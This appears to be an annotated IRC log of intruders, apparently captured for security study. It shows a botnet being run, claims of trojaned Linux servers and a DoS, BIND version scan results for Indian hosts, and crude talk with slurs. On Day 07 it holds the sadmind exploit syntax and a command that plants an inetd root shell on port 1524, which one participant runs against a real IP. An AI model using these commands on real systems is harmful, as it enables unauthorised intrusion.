:D1ck :got :D1ck :busted :D1ck :in :D1ck :canada :Sp07 :NOTHING BIG :D1ck :he was smoking in his backyard :Sp07 :THEY JUST TAKE YOUR WEED AWAY :D1ck :some one comlained :D1ck :and he was arrested :Sp07 :WELL GO FUCKING KILL THEM :D1ck :well :D1ck :ure parents get charged if yure's a juvenule :Sp07 :UHH :D1ck :under juvinile delinquent act :Sp07 :ITS NOT THAT BIG OF A DEAL :Sp07 :I GOT CAUGHT A LOT OF TIMES :D1ck :AND U CAN BE TRIED AS A DULT :D1ck :AND :D1ck :BUSTED :Sp07 :NO YOU CANT :D1ck : :Sp07 :THEY JUST TAKE YOUR WEED :D1ck :oh :D1ck :hahahaha :Sp07 :AND THEN THEY GO SMOKE IT :D1ck :j/k :D1ck :J/K :Sp07 :THOSE BASTARDS :Sp07 :CAN :Sp07 :SUCK :Sp07 :MY :Sp07 :DIACK :D1ck :HAHAHAHAHA :D1ck :complain@ :D1ck :DOES YURE MOM AND DAD SMOKE MARAJUANA :D1ck :? :Sp07 :NO :D1ck :that sucks :D1ck : :Sp07 :IF I COMPLAIN THEY WILL GET THOSE STICKS AND BEAT ME :D1ck :all my freinds in canada's mom dad, stem mom stepdad smoked weed :D1ck :HAHAHAHAHAHA :D1ck :HAHAHAHAHAHA :Sp07 :HAHAHHHAHHHHHHHHHHHHHHHHHHHHHHHH :D1ck :HAHAHHHAHHHHHHHHHHHHHHHHHHHHHHHHAHAHAHAHAHA :Sp07 :ITS TRUE :Sp07 :THEY ARE NOT COPS :Sp07 :THEY ARE A GOVERNMENT GANG :D1ck :smoking marjuana is likee 'cool'? :Sp07 :I GUESS :Sp07 :ITS FUN :D1ck :oh :Sp07 :ITS NOT LIKE SMOKING :D1ck :it tastes good? :Sp07 :NO ITS NOT LIKE SMOKING :Sp07 :SMOKING CIGARETES IS LIKE POINTLESS :Sp07 :WEED AFFECTS YOUR MIND AND BODY :D1ck :yep :D1ck :well :D1ck :? :D1ck :oh :D1ck :and u get hungary :D1ck :and :D1ck :shit :D1ck :? :Sp07 :YUP :Sp07 :ITS NOT JUST THAT :Sp07 :I LOVE WEED :D1ck :coolk :D1ck :cool :Sp07 :IT TAKES ME TO MY OWN WORLD :Sp07 :MWUHAHAHAHAHA :D1ck :Ok i disclose my self. :D1ck :I`m a FED :Sp07 :?? :Sp07 :OH SHIT :D1ck :You are busted :Sp07 :FUCK YOU :Sp07 :DIE MOTHER FUCKER :Sp07 :FOR REAL???? :Sp07 :officer :D1ck :yes. :Sp07 :suck my dick :D1ck :dude :D1ck :relax :Sp07 :no wonder :Sp07 :how would a pakistanian know english :Sp07 :its all clear :Sp07 :hey :D1ck :hehe :Sp07 :your not really a fed right?? :D1ck :y0 :D1ck :? :Sp07 :dont even joke like that :D1ck :nope :D1ck :ok :Sp07 :MAKES ME FEEL NERVOUS :D1ck :i`m not a fed :D1ck :why did u take it so serious? :Sp07 :I DUNNO :D1ck :oh :D1ck :ok :D1ck ::P :D1ck :if i was a fed :Sp07 :SHIT MY DADS LEAVING :Sp07 :TIME TO GET HIGH :D1ck :i wont be liek hacking shit :D1ck :hahahaa :D1ck :ok :Sp07 :HOPEFULLY HE WONT BE BACK FOR A WHILE :D1ck : FUCK YOU :D1ck : DIE MOTHER FUCKER :D1ck : FOR REAL???? :D1ck : officer :D1ck :hehehe :Sp07 :DAMN HIS CAR IS NOT PULING OUT THE DRIVEWAY :D1ck :hehee :Sp07 :IF FEDS WERE TRYING TO CATCH ME FOR THE SHIT IVE DONE LONG TIME AGO :Sp07 :THAT WOULD BE FUCKED UP CAUSE I STOPPED DOING ILLEGAL SHIT NOW :D1ck :yep :Sp07 :HIS CARS GONE :Sp07 :BRB :D1ck :man dont think i`m a fed :D1ck ::) :D1ck :i`m a elite hacker :D1ck :brb too :Sp07 :FUCK :Sp07 :HES GONNA COME RIGHT BACK :D1ck :lol :Sp07 :*SNIFF* *SNIFF* :Sp07 :I WANT TO SMOKE WEED :D1ck :no one else at home :D1ck :bro? :D1ck :sis :D1ck :mom :D1ck :? :Sp07 :MY BROTHER :Sp07 :BUT I DONT GIVE A FUCK :Sp07 :I WILL KILL HIM IF HE TELLS :Sp07 :HEHE :D1ck :LOL :Sp07 :HES A LITTLE KID HE DOESNT KNOW WHAT THE FUCK IS GOING ON :D1ck :u guys can like smoke in front of parents eh? :D1ck :thats like col :Sp07 :HELL NO :D1ck :cool :D1ck :? :Sp07 :WHY DO YOU THINK WE CAN SMOKE IN FRONT OF PARENTS? :Sp07 :FUCK YOU FED :Sp07 :STOP ASKING ME QUESTIONS :D1ck :heh :D1ck :coz all my freinds did :D1ck : :Sp07 :WELL DOWN IN AMERICA ITS DIFFERENT :D1ck :oh :Sp07 :YOUR A FED :D1ck :no :Sp07 :YES :D1ck :i`m not :D1ck :hehe :Sp07 :YES :Sp07 :YES :D1ck :man :D1ck :man :D1ck :if i were a fed :D1ck :why would i hack stuff? :D1ck :defacements :D1ck :qall :Sp07 :UHHH SO YOU SAY :D1ck :all these bots :Sp07 :JUST TO GET IN THE CROWD OF HACKERS :D1ck :no :D1ck :hehehe :D1ck :lol :Sp07 :THESE BOTS COULD BE PAYED BY THE GOVERNMENT :D1ck :hahah :D1ck :man :Sp07 :YOU THINK FEDS WONT DO ILLEGAL THINGS? :Sp07 :YEAH RIGHT :D1ck :what proof u want :D1ck : :D1ck :i live in pakistan :Sp07 :HOW DO I KNOW THAT/? :D1ck :call me :D1ck :o :Sp07 :GIMME YOUR # :D1ck :well :D1ck :599823 :D1ck :call me :Sp07 :THATS NOT A REAL # :D1ck :that is :Sp07 :WHAT DO I PRESS ON THE PHONE :D1ck :9221 is the key :Sp07 :1- :Sp07 :WHAT? :Sp07 :19221599823??? :D1ck :92 21 599823 :D1ck :yea :D1ck :let me come with my real ip :Sp07 :CALL YOU SO YOU CAN TRACE MY PHONE #? :D1ck :man :Sp07 :HEHEHEEHE :D1ck :ask rr :Sp07 :just kidding :Sp07 :hahahaha :D1ck :*sigh& :D1ck :*sigh :D1ck :8:) :Sp07 :RR IS A FED TOO MAN :Sp07 :DIDNT YOU KNOW THAT? :D1ck :REALLY? :D1ck :COOOOOOOOL :D1ck :Sp07 :D1ck :are u there :D1ck :I AM A FED :D1ck ::) :Sp07 :? :Sp07 :afk :Sp07 :fuck tou :Sp07 :afk :D1ck :heeh :D1ck :k :D1ck :^6thsense join #grid :Sp07 :nacl :Sp07 :back :Sp07 :me go :Sp07 :bye bye :D1ck :dns-xxx join #grid :D1ck :.part #grid =-= Day 06 June 9 :jupe__ :D1ck :J4n3 :J4n3 :D1ck :D1ck :sup :D1ck ::) :J4n3 :i can't access www.example.com with the user k1dd13 and pass u gave :D1ck :shit :D1ck :i think they clsoed the site? :D1ck :even soulslack couldnt :J4n3 :erhmm :D1ck :sha..d4v3 :J4n3 :yup that is :D1ck :hmm :D1ck :site works? :J4n3 :wait :J4n3 :yup :J4n3 :site is working :D1ck :yaar :D1ck :hmm :D1ck :may be that little fuck changed it? :D1ck :i logged in witht he pass some while go :D1ck :sha..d4v3 :D1ck :in the url did u choose www.example.com? :D1ck :in the url did u choose www.example.com? :D1ck :in the url did u choose www.example.com? :J4n3 :wait lemme login from webstie :J4n3 :website :J4n3 :yeah :J4n3 :i did :D1ck :oki :D1ck :oh :D1ck :website say karo do it from the website :D1ck :oki :D1ck :oye brb p00p :J4n3 :k :D1ck :~back :D1ck :sigh :D1ck ::) :J4n3 :ATTENTION: :J4n3 :Some users password information became corrupted during a hard drive backup. This is easily fixed if you :J4n3 :following the instructions below. :J4n3 :1) Go to www.example.com and log in as normal EXCEPT where it asks for your password leave it blank. :J4n3 :2) Once you are in your example.com account manager click on Account Information in the bottom right. :J4n3 :3) Next click on change password. :J4n3 :4) Now you are asked to type in your current password and your new passwords. Just leave the current password :J4n3 :opti :D1ck :hmmm :D1ck :do it@? :J4n3 :trying to do it, logged in from www but again same message :J4n3 :trying from www.example.com :J4n3 :ek tho ek gantay main page load hotha hai iska one is that it takes an hour for the page to load :J4n3 ::( :D1ck :hmmmm :D1ck :hehe :D1ck :get it some where else? :J4n3 :do u have those htmls in a zip file etc ? :D1ck :oye :D1ck :J4n3 :D1ck :send me that linux login trojan :D1ck :not root/owned :D1ck :the other wala the other one (wala = one, in a person connotation, like "the one") :D1ck ::) :D1ck :yep :D1ck :i think i do :J4n3 :its on ftp get it :J4n3 :shell.example.net :D1ck :oki :D1ck :whats the pass? :D1ck :user pass? :D1ck :oki :D1ck :ACTION is away: (sex) [BX-MsgLog On] :D1ck :ACTION is back from the dead. Gone 0 hrs 0 min 2 secs :J4n3 :hehe :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck :gridisgay nick wise :gridisgay :D1ck :gridsux hostile :D1ck :gridsux nick le :gridsux :D1ck :gridsux nick hostile :D1ck :kaos__ nick thor` :kaos__ :D1ck :kaos___ nick nohup :D1ck :kaos_ nick host-t-ns :kaos_ :D1ck :kaos___ nick nohup- :D1ck :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck :.save' :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck :kaos____ nick nohup- :kaos____ :D1ck :nohup- nick nohup :nohup- :D1ck :nohup save :D1ck :hehe :D1ck :hafeeeez :D1ck :.add J4n3 * J4n3 100 1 4 NOTICE D1ck :Handle J4n3 is already in use :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck :all new LINUX BOTS :D1ck :ner hot :J4n3_ :D1ck :J4n3 :D1ck : :D1ck ::) :D1ck :mera babies my babies :D1ck :eheheh :J4n3 :D1ck :) :J4n3 ::O) :D1ck ::) :D1ck :sup? :D1ck :scan isps for bind :D1ck :we`ll deface indian pages [note from Saumil: those bastards :D1ck ::) :J4n3 :errr yeah actually us raath j0e kay server par sub delete karna para tha err yeah actually that one night we had to delete everything from j0e's server :J4n3 :thakay usay patha na chalay kay mainay scanning ke the that he wouldnt come to know that i did scanning from it :D1ck :oh :D1ck : :D1ck :oki :D1ck :hehehe :J4n3 :aaj raath jama kartha hon linux say khud he tonight i will assemble (collect) everything from linux itself :D1ck :where is my account? :J4n3 :oye worldtel r0x now :D1ck :jeje :J4n3 ::p :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :J4n3 :D1ck :D1ck :yo :J4n3 :site is up at www.example.net :J4n3 :i will set up graphics and cgi password stuff tomorrw :D1ck :kewl :J4n3 :but :D1ck :oki :J4n3 :tell me where is the link of that passwod page ? :J4n3 :i mean where u want to put that password page link ? :D1ck :????? :D1ck :oh :D1ck : /elite-sploit-59865.html :D1ck :? :J4n3 :u want that sploit page na ?? where should be the link for it from main page ? :D1ck :nope hidden :D1ck :nope hidden :D1ck : :J4n3 :ok :J4n3 ::) :D1ck :;) :J4n3 :www.example.net/members ? :D1ck :yep :D1ck :yep :J4n3 :h4r33 is ~intrusion@ns3.example.net.xx * ONLY GOD CAN JUDGE ME :J4n3 :h4r33 on @#delusion :D1ck :hahaha :D1ck : SignOff h4r33: #LinuxSex (Ping timeout for h4r33[ns3.example.net.xx]) :J4n3 :hehe :J4n3 :i'm dosin satnet :D1ck :hehe :D1ck :kewl :D1ck :ahhahhAhaHAhahHAha :J4n3 :can't u see all ping time out lol :D1ck :hahaha :J4n3 :ph34r my b4ndw17h :pPpPpPP :D1ck ::) :D1ck :i pjh34r yure sk1llz muh sand niggah :D1ck :hehe :J4n3 :lol :J4n3 :tight :p :J4n3 :oye :J4n3 :i have a sploit for BitchX buffer overflow :J4n3 :but codin kuch sahi nahin but the coding isnt correct :J4n3 :it will get a root shell on some port :J4n3 :BitchX 75 pana :J4n3 :or 74 i think :D1ck :hmmmm :D1ck :send me the code. :J4n3 :itn in linux, get it later when i boot :D1ck :J4n3 :D1ck :? :D1ck :i`ll get 32 more bots tommorow :D1ck ::) :D1ck :oye :D1ck :cant access example.net :J4n3 :huh ? :J4n3 :its working fine :J4n3 :www.example.net :D1ck :hehe :D1ck :i tried :D1ck :permission denied :J4n3 :acha wait acha = ok, or good :D1ck ::) :J4n3 :D1ck try now :D1ck :ok :D1ck :brb :J4n3 :kkzkk :J4n3 :hiall nick y00z :hiall :D1ck :J4n3 :D1ck :there? :D1ck :just got back :D1ck :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck :kaos1299 nick link :D1ck :kaos2440 weener :D1ck :kaos452 nick queer :D1ck :kaos6065 nick wtf :kaos6065 :D1ck :kaos6567 nick ping :D1ck :kaos6927 nick smurf6 :kaos6927 :D1ck :kaos7950 nick rofl :D1ck :%kaos7950 nick hierachy :D1ck :kaos93 nick anarchy^ :D1ck :kaos9719 nick ultralame :kaos9719 :D1ck :kaos_ nick host-l :kaos_ :D1ck :kaos__ nick software :kaos__ :D1ck :kaos___ nick oracle :kaos___ :D1ck :kaos___ nick java :D1ck :kaos____ nick argv[1] :kaos____ :D1ck :kaos_____ nick dotcom :D1ck :brb :J4n3 :op me :J4n3 :op me :J4n3 :op me :J4n3 :op me :J4n3 :JAVED thanx :p :J4n3 :tryin some more :p brb :D1ck :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck :_aos_____ nick lagged :_aos_____ :D1ck :___s_____ nick xinetd :___s_____ :D1ck :kaos1299 nick tsmurf :kaos1299 :D1ck :kaos2440 nick HISTFILE :kaos2440 :D1ck :kaos3708 nick cunt` :kaos3708 :D1ck :kaos452 nick whore- :D1ck :kaos6567 nick tumble :D1ck :kaos7056 nick debain :kaos7056 :D1ck :kaos7950 nick PHAT :kaos7950 :D1ck :kaos891 nick nEtbSd :kaos891 :D1ck :kaos9379 nick solaris :D1ck :kaos_ nick unix-r :D1ck :kaos__ nick slackware :kaos_ :D1ck :kaos____ nick romance :kaos____ :D1ck :kaos_____ nick ZoRRo^ :kaos_____ :D1ck :kaos4230 nick [A]]] :kaos4230 :D1ck :kaos452 nick [b]]] :kaos452 :D1ck :kaos6511 nick gb :kaos6511 :D1ck :kaos9379 nick heat :D1ck :%_aos_____ nick kr-subnet :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck :_aos_____ nick jang :_aos_____ :D1ck :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :kaos9379 :D1ck :kaos1024 nick pop3 :D1ck :kaos2922 nick imapd :kaos2922 :D1ck :kaos3854 nick syko :D1ck :kaos4752 nick bitch_ :kaos4752 :D1ck :kaos3854 nick sykoseal :kaos3854 :D1ck :__os_____ nick xperience :D1ck :_________ nick line :_________ :D1ck :_________ nick line :D1ck :_________ nick linely :D1ck :wtf :D1ck :__os_____ nick SEX :__os_____ :D1ck :.add D1ck * D1ck 100 1 4 NOTICE D1ck :Handle D1ck is already in use :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :kaos_ :D1ck :J4n3 :D1ck :J4n3 :J4n3 :fuck :J4n3 :fuck :D1ck :fuck? :D1ck Sp07 :Bitch-X BaBy :J4n3 :thanx :P :J4n3 :Haji bana diya betay betay Ok made it boy :D1ck :hehe come with yure ip i`ll add u to the new 40 bots :D1ck :i owned and trojaned 40 servers of linux in 3 hours :D1ck ::))))) :J4n3 :heh :J4n3 :damn :D1ck :heh :J4n3 :107 bots :D1ck :yup :J4n3 :wait brb :D1ck :105 :P :J4n3 :back :D1ck :kewl :D1ck :one sec :J4n3 :kkz :D1ck :.add J4n3 * J4n3 100 1 4 NOTICE D1ck :Handle J4n3 is already in use :D1ck :.save NOTICE D1ck :Lists saved to file emech233.users NOTICE D1ck :Levels were written to ./mech.levels :D1ck :.say hehe PRIVMSG :Ott0 :hehe :anker :hehe :sshd :hehe :grep :hehe :jolt` :hehe :le :hehe :grep-v :hehe :netra :hehe :DEATHaCeS :hehe :Tota1KaaS :hehe :k-rad- :hehe :inetd-s :hehe :rpcbind :hehe :nohup :hehe :IgVip :hehe :save :hehe :Nine-mm :hehe :Animator_ :hehe :|ssh| :hehe :bevelz :hehe :spl1terz :hehe :jupe_ :hehe :wise :hehe :host-t-ns :hehe :s3ga :hehe :jupe2-bot :hehe :thor` :hehe :deb1an :hehe :w0lf_ :hehe :ttys1 :hehe :\dev\idle :hehe :slack :hehe :init-tab :hehe :cr4cked :hehe :Azz-Man :hehe :s1ack :hehe :Sun- :hehe :sximap :hehe :rewter :hehe :redcap :hehe :lickerz :hehe :host-l :hehe :software :hehe :DoS_ :hehe :pr0be- :hehe :des|re :hehe :satan^666 :hehe :digi-x :hehe :pathanb0t :hehe :b3473r :hehe :pimpX :hehe :d1g1tal :hehe :k-r4d :hehe :t0sh1ba :hehe :jupah :hehe :jupe-bot :hehe :CyneX :hehe :OngHome :hehe :ath0 :hehe :ath0_ :hehe :obsleet :hehe :kaos___ :hehe :unix-r :hehe :gb :hehe :heat :hehe :line :hehe :romance :hehe :wtf :hehe :jang :hehe :kaos6567 :hehe :smurf6 :hehe :bitch_ :hehe :nEtbSd :hehe :cunt` :hehe :s0lar1s :hehe :r00t^666 :hehe :Nickless :hehe :imapd :hehe :kaos__ :hehe :peniswise :hehe :VsnL2 :hehe [note from Saumil: this system is actually in India - in Bangalore. VSNL is a nationwide ISP.] :[A]]] :hehe :kaos1024 :hehe :[b]]] :hehe :sykoseal :hehe :debain :hehe :SEX :hehe :ZoRRo^ :hehe :lagged :hehe :PHAT :hehe :xinetd :hehe :argv[1] :hehe :tsmurf :hehe :ultralame :hehe :J4n3 :lol :J4n3 :.say y0 y0 :tr1cks :y0 y0 :Animator_ :y0 y0 :|ssh| :y0 y0 :bevelz :y0 y0 :spl1terz :y0 y0 PRIVMSG :Nine-mm :y0 y0 :wise :y0 y0 :host-t-ns :y0 y0 :deb1an :y0 y0 :s1ack :y0 y0 :sximap :y0 y0 :\dev\idle :y0 y0 :r00t^666 :y0 y0 :rewter :y0 y0 :Azz-Man :y0 y0 :Sun- :y0 y0 :w0lf_ :y0 y0 :s0lar1s :y0 y0 :redcap :y0 y0 :slack :y0 y0 :init-tab :y0 y0 :cr4cked :y0 y0 :ttys1 :y0 y0 :Ott0 :y0 y0 :jolt` :y0 y0 :pr0be- :y0 y0 :des|re :y0 y0 :digi-x :y0 y0 :pathanb0t :y0 y0 :chill3r :y0 y0 :jupe2-bot :y0 y0 :s3ga :y0 y0 :software :y0 y0 :thor` :y0 y0 :host-l :y0 y0 :DoS_ :y0 y0 :anker :y0 y0 :sshd :y0 y0 :grep :y0 y0 :le :y0 y0 :grep-v :y0 y0 :netra :y0 y0 :DEATHaCeS :y0 y0 :Tota1KaaS :y0 y0 :k-rad- :y0 y0 :inetd-s :y0 y0 :nohup :y0 y0 :IgVip :y0 y0 :save :y0 y0 :OngHome :y0 y0 :ath0 :y0 y0 :lickerz :y0 y0 :var1ant :y0 y0 :ath0_ :y0 y0 :jupah :y0 y0 :b3473r :y0 y0 :pimpX :y0 y0 :d1g1tal :y0 y0 :k-r4d :y0 y0 :t0sh1ba :y0 y0 :kaos___ :y0 y0 :unix-r :y0 y0 :gb :y0 y0 :heat :y0 y0 :[b]]] :y0 y0 :line :y0 y0 :sykoseal :y0 y0 :tsmurf :y0 y0 :lagged :y0 y0 :ultralame :y0 y0 :ZoRRo^ :y0 y0 :jang :y0 y0 :obsleet :y0 y0 :kaos6567 :y0 y0 :smurf6 :y0 y0 :bitch_ :y0 y0 :romance :y0 y0 :SEX :y0 y0 :wtf :y0 y0 :xinetd :y0 y0 :argv[1] :y0 y0 :cunt` :y0 y0 :Nickless :y0 y0 :kaos1024 :y0 y0 :imapd :y0 y0 :kaos__ :y0 y0 :debain :y0 y0 :peniswise :y0 y0 :PHAT :y0 y0 :jupe-bot :y0 y0 :CyneX :y0 y0 :VsnL2 :y0 y0 :[A]]] :y0 y0 :nEtbSd :y0 y0 :D1ck :errrr :D1ck :uplam taplam karta tha you're dinking around :D1ck :kity pai kity pai ji eye jo [some babbling - ending with G I Joe] :D1ck :macdonalds may hai kuch baaat is there any talk of macdonalds? :J4n3 :lol :oracle :hehe :oracle :y0 y0 :J4n3 :wait ek second keliye channel karachi bejtha hon inko, no one is there right now, zara bharam wait for one second, sending them to channel to karachi, no one is there right now, for a little :Vamp|re` tum channel pe raaj karo :p well go ahead and rule the channel :p :J4n3 :aur kithnay chaiyen ? how many more do you want? :Vamp|re` aab kush ho gaay are you happy now? :KILLER1?:abey yaar yeh emechs hain saarey!? hey dude are these emechs all there? :KILLER1:abey yaar yeh emechs hain saarey! :Vamp|re`:hamain apn apata nahi chaal raha in bot ke bech main we cannot figure out ourselves in these bots? (i dont know if i could get the accurate transation on this one) :KILLER1 :baney howey hain emech sey made from emech :D1ck :hehehe :D1ck :sure :D1ck :they are secure :D1ck :they are secured :D1ck :i patched all those fucking hosts :P :J4n3 :haha who tho hobee gaya haha that has already been done :D1ck :and i bet naveed couldnt own bind :J4n3 :kub ka join karkay part karwa diya since long made him part after joining :D1ck :haha :D1ck :lol :D1ck :kewl :J4n3 :hhahha :D1ck :hehe :J4n3 :usko bind ka patha hee nahin he doesnt even know about bind :D1ck :oye give me some indian class b :D1ck :i`ll mass own :J4n3 :bind ? :D1ck :yep :J4n3 :Vamp|re` yaar isko baksh day pehlay hina kay site ja chuka hai vampire, wish him well before he goes to hina's site :D1ck :? :J4n3 :oops :D1ck :mujhay aik lafz nahin samhaj may aya i cant undertstand one thing :D1ck :y0 :D1ck :u hyper ircer :D1ck ::P :J4n3_ ::) :J4n3_ :ip resolve nahin huwa ip couldnt resolve :D1ck :hehe :D1ck :irc0p.org :D1ck :? :J4n3_ :heh yeah :D1ck :J4n3 it's imp when u get back messsage me. :J4n3 :abay i am ehre :J4n3 :lol :D1ck :ACTION is away: (sleep) [BX-MsgLog On] :J4n3 :D1ck :J4n3 :D1ck :J4n3 :netsrvrcs.saha.ernet.in's named that errors on iquery is version: 8.1.1 [note : ernet.in is an Indian Educational and Research network (ERnet)] :J4n3 :hp1.example.in's named that errors on iquery is version: 8.2.1 :J4n3 :hp2.example.in's named that errors on iquery is version: 8.2.1 :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2 :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2 :J4n3 :tnp.example.in's named that errors on iquery is version: 8.1.2 :J4n3 :niss.example.in's named that errors on iquery is version: 8.1.2 :J4n3 :192.168.151.3's named that errors on iquery is version: named 4.9.5-Rel+- :D1ck :b0h :D1ck ::) :D1ck :errrrr :D1ck :get me some domains :D1ck :like :J4n3 :hehe :D1ck :kewl :D1ck ::P :J4n3 :scanning horahi ahi na in.log scanning is being done in in.log [note: would be worthwhile snagging that in.log file for IPs and scan results] :D1ck :okie :D1ck :hehe :D1ck :oye :J4n3 :yeah ? :D1ck :how big is yure cracking file? :D1ck :word lisT? :J4n3 :humm 100 mb i think :J4n3 :may be more not sure :D1ck :wow :D1ck :where did u get it? :D1ck :i want it tew :D1ck :i want it tew :J4n3 :packetstorm :p :D1ck :i want it tew :D1ck :oki :D1ck :;) :J4n3 :ARGONG's Dictionary :J4n3 :ARGON'S even :J4n3 :oye 100 mb nahin hia yo 100mb is not there :J4n3 :in zip fiel its 65 mb i think :J4n3 :or 25 not sure but when u unzip its 234 mb :D1ck :wow :D1ck :please give me the exact url :D1ck ::P :D1ck ::P :D1ck :i`ll download :J4n3 :dont remember yaar, i downloaded it long ago :D1ck :oh :D1ck :;( :J4n3 :but its in Archieve/wordlists :J4n3 :thats what i remember :D1ck :oh :J4n3 :D1ck :J4n3 :try to use Crack5 :D1ck :? :J4n3 :its kewl :J4n3 :and the best cracker :D1ck :what's that? :D1ck :send me :D1ck :send me :D1ck : /dcc :J4n3 :i dont have it :J4n3 :coz i couldn't configure it :J4n3 :but u can get it from packetstorm :D1ck :oh :J4n3 :same Archieve cracks :D1ck : okies :D1ck :i will :D1ck :i cant get in archieves :D1ck :whats the url for archives? :J4n3 :wait lemme check :D1ck :packetstorm.securify.com/archieve? :D1ck :? :J4n3 :D1ck :D1ck :? :J4n3 :packetstorm.securify.com/assess.html :J4n3 :check password crackers link in this page :D1ck :oki :D1ck :and wordlist? :D1ck :i found it :D1ck ::) :D1ck :Read 65 KB of data, 6 KB/sec. :D1ck :wow :D1ck :6 KB :D1ck ::) :D1ck :man :D1ck :tehere are 300 .gz :D1ck :which one should i download? :D1ck :name :D1ck :? :D1ck :??????? :D1ck :??????? :D1ck :????? :D1ck :?????? :J4n3 :hhaha u mean wordlist ? :J4n3 :look for Argon :D1ck :yep :D1ck :oiki :D1ck :there is no argon :D1ck :? :D1ck :???????? :D1ck :?????????????? :D1ck :? :D1ck :??????????????????????????????????????????????????? :D1ck :??????????????????????????????????????????????????? :D1ck :??????????????????????????????????????????????????? :D1ck :??????????????????????????????????????????????????? :D1ck :??????????????????????????????????????????????????? :D1ck :oye :D1ck :J4n3 :D1ck :u there? :D1ck :i got d/c :D1ck :world tel roc :D1ck :world tel rox :D1ck :OH MY GOD :D1ck :10 K :D1ck :OH GOD :D1ck :6 K :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :kaos1024 :kaos__ :kaos6567 -=-= Day 07 June 10 :m4ry :YO :m4ry :HEY :m4ry :WAKE UP MORONS :D1ck :ACTION is away: (Auto-Away after 15 mins) [BX-MsgLog On] :D1ck :.add D1ck * D1ck 100 1 4 :D1ck :.save :_pen :whats goin on? :D1ck :nadda :D1ck :bored :_pen :em too :_pen :i got my first legit shell :D1ck :haha :D1ck :cool :D1ck :how much did u pay? :_pen :nothing :D1ck :.add D1ck * D1ck 100 1 4 :_pen :heh :D1ck :.save :D1ck :where had u bee/. :D1ck :u hang in #amdx? :_pen :no :_pen :they are being gay :D1ck :cool :D1ck :hehe :_pen :grid is mad cuz im friends with someone he hates :_pen :therefor im not aloud in there :D1ck :hahaha :D1ck :grid's gay' :D1ck :U HANG WITH DIZASYA :D1ck :DIZSTA :D1ck :HEH :D1ck :i`ve hacked 30+ of his shells :D1ck :he doesnt even know hwo to secure it :D1ck :or secure a subnet :D1ck :tons locally :D1ck :_pen :D1ck :dont hand over the key to any one :D1ck :ok? :_pen :ok :D1ck :_pen: who gave u the key, btw? :D1ck :m4ry?? :_pen :*** D1ck has joined #lecole :_pen : j #k1dd13 neat22 :D1ck :oh :_pen :) :D1ck :h3h :_pen :=) :D1ck ::) :D1ck :ok :D1ck :what in the world are u doing in #deathaces? :D1ck :heh :_pen :what is it? :D1ck :a channel for fun :_pen :i just did a whois :_pen :and saw someone in there :_pen :and joined :D1ck :heh kl :_pen :a channel for fun == ? :D1ck :welp :D1ck :hey hang in for chatting etc :D1ck ::) :_pen :k :D1ck ::) :_pen :hey :_pen :do u have the syntax :_pen :for :D1ck :yeah :_pen :sadmind exploit :_pen :? :D1ck :lol :D1ck :yes :_pen :what is it :D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p] :_pen : what do i do for -c :D1ck :heh :D1ck :u dont know? :_pen :no :D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob" :D1ck :that would open 1524 :_pen :%sp 0x00000000 offset 688 --> return address 0x000002b0 :_pen :[4] :_pen :%sp 0x00000000 with frame length 4808 --> %fp 0x000012c8 :_pen :exploit failed; RPC succeeded and returned { 2, 343, "[1,1,1] :_pen : :_pen :" } :D1ck :c==command :_pen :wtf :_pen :it seg faulted :_pen :./sadmindex-sparc -h 203.252.173.250 -c "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob" :_pen :thats what i did :_pen :heelo? :D1ck :[Lag ??] :D1ck :what did u ask :D1ck :repeat again :D1ck :i got d/c :_pen :./sadmindex-sparc -h 203.252.173.250 -c "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob" :_pen :thats what i did :_pen :and it seg faulted :D1ck :dunno :D1ck :brb :Insekt :thanks :D1ck :yep :D1ck :np :D1ck :mechnet :Insekt :nice :Insekt :it was in #flem for a little while right? :Insekt :or some of them :Insekt :even :D1ck :? :insekt` :? :insekt` :what? :D1ck :hehe :insekt` :flem lost ops again :insekt` :heh :D1ck :shit :D1ck :heh :D1ck :i`ll fuck all of them :insekt` :it happens like every week :D1ck :to regain :D1ck :i offfered them bots :D1ck :but no no :D1ck :dont listen to me :insekt` :heh :D1ck :heh :insekt` :its always a good chan though :D1ck :yep :insekt` :with or without ops :D1ck :;P :insekt` :heh :D1ck :;p :insekt` :so, whats been going on? :insekt` :hah :insekt` :am join chan #enforcers :D1ck :heh :insekt` :elite :insekt` :dammit :insekt` :heh :D1ck :ACTION is away: (SLEEP) [BX-MsgLog On] :D1ck :cya :D1ck :gave to sleep :insekt` :see ya -=- Day 08 June 11 :m4ry :.deop jupe :m4ry :.up :m4ry :wise op m4ry :m4ry :wise deop jupe :m4ry :.say hi :kaos__ :hi :kaos____ :hi :kaos_____ :hi :_aos_____ :hi :kaos___ :hi :jupe :hi :m4ry :jupe part :D1ck 